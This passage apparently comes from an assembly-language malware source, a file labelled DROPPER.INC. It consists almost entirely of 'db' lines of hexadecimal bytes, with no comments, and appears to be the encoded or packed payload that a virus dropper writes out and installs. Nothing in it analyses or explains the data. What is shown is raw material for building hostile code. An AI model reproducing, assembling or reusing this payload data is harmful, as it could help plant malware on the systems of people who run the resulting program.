0DAh, 040h, 0B4h, 0C1h, 0A6h, 061h, 0A5h, 07Fh db 06Ah, 041h, 04Ah, 082h, 06Ah, 061h, 03Ch, 057h db 03Fh, 0D5h, 021h, 0DAh, 007h, 092h, 001h, 0B6h db 01Fh, 0A4h, 020h, 0A1h, 05Fh, 0C9h, 0C5h, 0CFh db 0C4h, 06Ch, 042h, 0D5h, 03Ch, 020h, 0B4h, 095h db 0FFh, 048h, 020h, 0BCh, 035h, 043h, 024h, 03Eh db 0DFh, 022h, 053h, 0C5h, 074h, 053h, 0BCh, 040h db 05Ah, 0CBh, 0EFh, 0DAh, 089h, 08Dh, 080h, 041h db 0ADh, 03Eh, 0CDh, 00Dh, 06Ch, 0C5h, 0CFh, 0B7h db 03Dh, 02Bh, 0B7h, 043h, 00Eh, 010h, 0FFh, 094h db 022h, 0ABh, 04Fh, 02Eh, 052h, 0F5h, 032h, 001h db 0FEh, 0E9h, 00Fh, 0C0h, 0AEh, 01Eh, 030h, 08Bh db 03Fh, 0FCh, 0B1h, 044h, 00Fh, 072h, 08Ch, 095h db 004h, 097h, 07Fh, 094h, 074h, 084h, 0B9h, 098h db 04Ch, 089h, 03Fh, 096h, 068h, 043h, 0C0h, 003h db 0BDh, 0CDh, 0E4h, 0F6h, 02Fh, 0CCh, 081h, 009h db 0C0h, 089h, 0F1h, 05Ch, 077h, 042h, 0AFh, 09Fh db 0C7h, 042h, 01Ah, 004h, 032h, 00Bh, 0CBh, 08Eh db 001h, 008h, 013h, 0B8h, 021h, 0DFh, 029h, 017h db 0BAh, 0D3h, 040h, 055h, 01Eh, 0C2h, 093h, 020h db 084h, 065h, 025h, 040h, 065h, 0E1h, 076h, 03Fh db 046h, 0A6h, 041h, 0AEh, 0FAh, 091h, 001h, 04Eh db 014h, 03Fh, 092h, 087h, 0B2h, 03Ah, 020h, 064h db 0FFh, 06Dh, 04Ch, 021h, 00Bh, 0D4h, 007h, 01Fh db 0F3h, 0D9h, 08Ch, 099h, 045h, 051h, 082h, 090h db 00Ah, 0C5h, 00Bh, 055h, 001h, 066h, 05Fh, 033h db 06Eh, 0D9h, 003h, 00Dh, 0FBh, 066h, 09Ch, 018h db 090h, 05Ch, 00Fh, 069h, 01Fh, 02Bh, 041h, 0B5h db 032h, 037h, 020h, 08Dh, 0ADh, 046h, 020h, 042h db 055h, 00Ah, 001h, 0C2h, 0B1h, 0C0h, 0FBh, 04Ch db 020h, 013h, 0DAh, 012h, 06Dh, 096h, 020h, 0EDh db 09Bh, 03Bh, 0EDh, 02Ah, 092h, 013h, 09Ah, 020h db 0AAh, 021h, 041h, 03Ah, 052h, 01Fh, 066h, 055h db 0EDh, 041h, 047h, 013h, 02Ah, 019h, 021h, 051h db 090h, 001h, 0B2h, 083h, 054h, 00Fh, 092h, 020h db 0CAh, 010h, 09Ah, 020h, 0AEh, 021h, 051h, 056h db 0A0h, 055h, 01Fh, 0CAh, 02Ah, 020h, 038h, 040h db 01Fh, 0A6h, 021h, 0E7h, 05Dh, 0C0h, 0A9h, 03Ah db 01Fh, 09Ch, 01Fh, 012h, 0D9h, 08Dh, 02Fh, 0A9h db 043h, 022h, 0CAh, 01Fh, 0CEh, 03Ch, 020h, 052h db 
0D9h, 021h, 09Ch, 0E2h, 0ABh, 001h, 0E4h, 055h db 01Fh, 09Ch, 06Bh, 021h, 02Bh, 022h, 0A9h, 01Eh db 02Bh, 01Fh, 0B9h, 0ABh, 00Ah, 021h, 039h, 0C5h db 0CEh, 09Ah, 01Eh, 096h, 01Fh, 0E3h, 049h, 021h db 05Dh, 022h, 055h, 01Eh, 076h, 01Fh, 043h, 0A6h db 063h, 0A2h, 022h, 0E5h, 068h, 029h, 01Fh, 06Ah db 001h, 0B8h, 052h, 022h, 0D4h, 01Eh, 0DCh, 021h db 0CAh, 021h, 06Ah, 022h, 0ABh, 01Eh, 038h, 052h db 05Ah, 052h, 022h, 0B6h, 03Ch, 0A7h, 09Ah, 029h db 01Fh, 04Dh, 018h, 02Eh, 08Eh, 0CDh, 051h, 014h db 05Eh, 040h, 051h, 00Dh, 0ABh, 03Ch, 079h, 0EAh db 001h, 079h, 013h, 0B5h, 004h, 007h, 02Ah, 018h db 057h, 049h, 055h, 0FFh, 04Bh, 01Fh, 09Ah, 002h db 0BAh, 01Eh, 0B9h, 022h, 00Ah, 05Eh, 040h, 09Ah db 069h, 0BFh, 080h, 014h, 00Ah, 0A2h, 0F9h, 0A9h db 0FEh, 001h, 0F4h, 0E1h, 01Eh, 0EEh, 023h, 012h db 010h, 0E3h, 070h, 085h, 0C7h, 03Dh, 01Ah, 01Eh db 0EFh, 02Dh, 07Fh, 003h, 0C2h, 036h, 020h, 0FBh db 03Dh, 071h, 00Ch, 045h, 0E3h, 0DAh, 002h, 079h db 07Fh, 01Bh, 084h, 038h, 037h, 080h, 0FBh, 00Ch db 0A4h, 01Dh, 0A2h, 020h, 08Ah, 001h, 021h, 071h db 037h, 045h, 001h, 065h, 01Eh, 053h, 020h, 014h db 0A6h, 021h, 0B6h, 07Bh, 0C8h, 041h, 00Ch, 04Dh db 04Ah, 059h, 01Fh, 09Ch, 003h, 01Ch, 06Bh, 03Eh db 0B5h, 042h, 015h, 01Dh, 020h, 0D4h, 001h, 08Dh db 016h, 042h, 05Dh, 05Eh, 0D6h, 09Bh, 03Dh, 0BDh db 029h, 020h, 07Ch, 0CAh, 051h, 020h, 0B9h, 079h db 052h, 020h, 06Ah, 085h, 07Fh, 053h, 052h, 041h db 021h, 029h, 037h, 060h, 094h, 0E3h, 080h, 0A9h db 05Dh, 020h, 045h, 03Fh, 036h, 020h, 00Dh, 0A7h db 060h, 036h, 002h, 040h, 055h, 031h, 03Fh, 0D6h db 094h, 0DDh, 0D5h, 042h, 020h, 0E5h, 015h, 021h db 020h, 092h, 054h, 024h, 060h, 0F7h, 048h, 035h db 043h, 034h, 040h, 08Ah, 05Fh, 052h, 020h, 08Eh db 010h, 011h, 09Ah, 0C5h, 0AAh, 07Bh, 0E0h, 0DBh db 0C5h, 036h, 020h, 042h, 048h, 0FBh, 060h, 0B4h db 09Eh, 020h, 04Eh, 0B7h, 0A8h, 055h, 062h, 05Dh db 020h, 023h, 061h, 092h, 02Dh, 0A1h, 0B6h, 042h db 044h, 0C1h, 093h, 0A0h, 06Ah, 01Fh, 05Ah, 087h db 021h, 0FBh, 038h, 024h, 061h, 071h, 073h, 0B8h db 
003h, 046h, 0DAh, 044h, 0CBh, 0B2h, 06Fh, 045h db 00Dh, 034h, 01Eh, 0A9h, 052h, 001h, 00Ah, 0BBh db 022h, 085h, 02Ah, 001h, 0EAh, 021h, 0FFh, 042h db 0E0h, 007h, 071h, 0EEh, 012h, 0FCh, 0A2h, 084h db 0E2h, 080h, 007h, 001h, 049h, 0D9h, 051h, 0F2h db 0B2h, 01Ch, 0D1h, 00Ch, 0EAh, 040h, 02Dh, 014h db 000h, 0D5h, 0B1h, 001h, 0B9h, 04Ah, 0A1h, 0E2h db 0F6h, 00Eh, 070h, 09Ah, 00Ch, 092h, 004h, 05Ch db 060h, 043h, 007h, 0D7h, 06Fh, 002h, 0B2h, 0D4h db 062h, 05Ah, 087h, 029h, 0FDh, 005h, 057h, 027h db 05Fh, 0BAh, 00Bh, 08Ah, 010h, 020h, 0B5h, 021h db 01Bh, 020h, 060h, 0FDh, 0A8h, 051h, 0DFh, 0A8h db 021h, 0FFh, 03Ah, 035h, 020h, 05Bh, 021h, 002h db 028h, 040h, 0EBh, 014h, 0ABh, 061h, 053h, 037h db 021h, 06Ah, 007h, 020h, 039h, 0BAh, 0F9h, 0C5h db 0F7h, 0ECh, 067h, 04Eh, 0B0h, 0D4h, 02Ah, 0D5h db 020h, 010h, 0DCh, 0F9h, 04Eh, 096h, 01Bh, 041h db 06Dh, 00Fh, 026h, 008h, 046h, 062h, 011h, 0D4h db 00Ah, 041h, 0D4h, 020h, 06Ah, 0CCh, 09Fh, 04Dh db 038h, 0C7h, 055h, 007h, 044h, 04Dh, 0A3h, 0E6h db 085h, 041h, 0F9h, 025h, 020h, 059h, 052h, 038h db 017h, 0C7h, 0A2h, 0F6h, 09Ah, 020h, 08Ah, 060h db 020h, 0EFh, 014h, 0CDh, 061h, 0E3h, 00Ah, 017h db 096h, 0C7h, 09Eh, 0BFh, 0A4h, 020h, 0D9h, 063h db 040h, 0F9h, 01Dh, 0B6h, 0C2h, 05Ah, 042h, 0DCh db 03Eh, 09Bh, 06Ch, 0B5h, 052h, 01Bh, 020h, 0DCh db 061h, 0A8h, 015h, 033h, 06Ch, 02Ah, 003h, 096h db 051h, 012h, 002h, 0FAh, 08Dh, 020h, 0DEh, 0CBh db 056h, 043h, 040h, 04Eh, 0CDh, 0E2h, 057h, 01Fh db 0FAh, 006h, 029h, 020h, 0EFh, 0F3h, 0A1h, 098h db 0D6h, 093h, 001h, 0D5h, 035h, 00Bh, 03Dh, 020h db 047h, 015h, 0FBh, 0E3h, 092h, 07Ah, 024h, 0AAh db 001h, 0ACh, 064h, 022h, 0F9h, 0A6h, 020h, 0ABh db 021h, 072h, 03Bh, 0A4h, 021h, 0DAh, 013h, 043h db 09Ch, 020h, 0E7h, 0F2h, 08Dh, 01Dh, 044h, 05Dh db 007h, 049h, 083h, 0D3h, 0FDh, 02Dh, 020h, 025h db 0E8h, 0ABh, 03Bh, 007h, 037h, 043h, 0A8h, 028h db 0D6h, 0A5h, 020h, 0BEh, 0C6h, 078h, 085h, 02Ah db 0A2h, 0D4h, 040h, 060h, 0F5h, 03Dh, 001h, 095h db 07Ch, 0F6h, 020h, 072h, 08Ch, 0A9h, 021h, 0F6h db 
049h, 003h, 0DEh, 0A9h, 03Fh, 02Eh, 0E9h, 0AAh db 0DCh, 040h, 0EEh, 09Ah, 02Fh, 0A9h, 019h, 02Ah db 0AAh, 01Eh, 026h, 00Eh, 06Ah, 01Fh, 02Bh, 040h db 029h, 082h, 028h, 044h, 090h, 0E3h, 0D3h, 03Fh db 037h, 089h, 03Dh, 03Bh, 0CAh, 0BBh, 060h, 0AAh db 007h, 094h, 001h, 0D4h, 038h, 01Fh, 0DCh, 0E9h db 080h, 0CDh, 0E3h, 0AAh, 0E0h, 002h, 0F1h, 056h db 01Eh, 03Fh, 0A5h, 020h, 06Dh, 006h, 059h, 024h db 059h, 01Fh, 04Eh, 060h, 029h, 0F6h, 004h, 035h db 084h, 066h, 07Ch, 003h, 056h, 0D7h, 020h, 069h db 045h, 0D9h, 09Eh, 045h, 0F9h, 029h, 001h, 04Bh db 020h, 06Ah, 0C9h, 01Eh, 0F3h, 053h, 03Eh, 020h db 099h, 003h, 0DCh, 015h, 054h, 019h, 007h, 08Ah db 0D7h, 020h, 0F3h, 0FCh, 055h, 01Bh, 056h, 01Fh db 073h, 094h, 042h, 0F5h, 071h, 0EDh, 05Fh, 020h db 0B5h, 07Fh, 021h, 029h, 0F7h, 02Ah, 04Dh, 003h db 055h, 007h, 068h, 020h, 01Bh, 0D5h, 086h, 04Ah db 0D2h, 01Fh, 077h, 0B6h, 002h, 043h, 0D4h, 006h db 015h, 0DBh, 00Ch, 052h, 025h, 032h, 07Bh, 09Ah db 030h, 071h, 0ECh, 091h, 0DFh, 0CAh, 022h, 0B6h db 008h, 024h, 0D4h, 042h, 02Eh, 08Fh, 0FFh, 05Bh db 011h, 038h, 044h, 05Dh, 0CAh, 033h, 09Ch, 01Bh db 055h, 01Eh, 040h, 0FFh, 06Ah, 042h, 004h, 05Ch db 0B6h, 042h, 08Dh, 0ACh, 03Fh, 0D4h, 0D3h, 040h db 0DBh, 060h, 055h, 044h, 045h, 04Dh, 063h, 043h db 041h, 00Eh, 06Fh, 002h, 028h, 075h, 013h, 06Ah db 081h, 04Dh, 03Fh, 0D1h, 001h, 0F6h, 096h, 040h db 02Ah, 00Eh, 05Dh, 061h, 0A4h, 040h, 0D4h, 0E1h db 015h, 07Dh, 0A6h, 03Fh, 0FFh, 009h, 052h, 040h db 0F7h, 033h, 0EDh, 01Bh, 005h, 034h, 052h, 026h db 03Fh, 09Bh, 01Eh, 0F5h, 022h, 0FFh, 0D3h, 09Ch db 040h, 0D5h, 07Eh, 07Fh, 094h, 071h, 07Dh, 0A9h db 09Fh, 0D3h, 0FDh, 0D1h, 059h, 040h, 0B5h, 032h db 022h, 02Dh, 03Fh, 0CAh, 093h, 020h, 089h, 0D1h db 007h, 0CAh, 09Ch, 040h, 0A5h, 03Fh, 02Ah, 0A0h db 0ABh, 040h, 03Ah, 002h, 0FFh, 06Dh, 065h, 07Fh db 0C7h, 094h, 069h, 055h, 0A0h, 035h, 040h, 055h db 001h, 03Fh, 0A6h, 061h, 0FBh, 022h, 050h, 053h db 040h, 072h, 0A3h, 026h, 0E7h, 00Ah, 03Fh, 052h db 0AAh, 07Fh, 0FFh, 0B7h, 081h, 0C8h, 0CDh, 054h db 
0F2h, 092h, 040h, 093h, 03Fh, 0A5h, 033h, 0DFh db 0EDh, 052h, 0BCh, 040h, 0D4h, 03Fh, 0F4h, 08Dh db 01Fh, 094h, 068h, 0D1h, 040h, 0B2h, 0EDh, 012h db 0B2h, 03Fh, 08Ah, 07Fh, 09Fh, 029h, 040h, 0CAh db 03Fh, 054h, 0A7h, 040h, 0B5h, 01Ch, 069h, 03Fh db 0ABh, 03Eh, 040h, 04Eh, 011h, 0D4h, 03Fh, 092h db 054h, 01Dh, 021h, 094h, 040h, 0A4h, 0D8h, 09Eh db 0F9h, 0A4h, 03Fh, 0E3h, 032h, 081h, 095h, 040h db 093h, 02Dh, 0A7h, 0E2h, 066h, 005h, 0A4h, 0FEh db 0A5h, 022h, 035h, 003h, 09Ah, 00Ah, 07Bh, 0B3h db 017h, 069h, 0ABh, 0F8h, 015h, 029h, 0BFh, 05Ah db 02Fh, 000h, 0A2h, 0CFh, 096h, 004h, 01Fh, 0C7h db 0F8h, 003h, 09Dh, 0C1h, 038h, 009h, 00Fh, 080h db 0F0h, 0E1h, 0FCh, 030h, 00Dh, 0C2h, 097h, 004h db 029h, 001h, 059h, 001h, 05Bh, 004h, 021h, 003h db 0E3h, 007h, 0C0h, 0F3h, 0F0h, 0A7h, 02Dh, 0B6h db 0E1h, 0FCh, 0EBh, 056h, 0CEh, 078h, 060h, 000h ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[DROPPER.INC]ÄÄÄ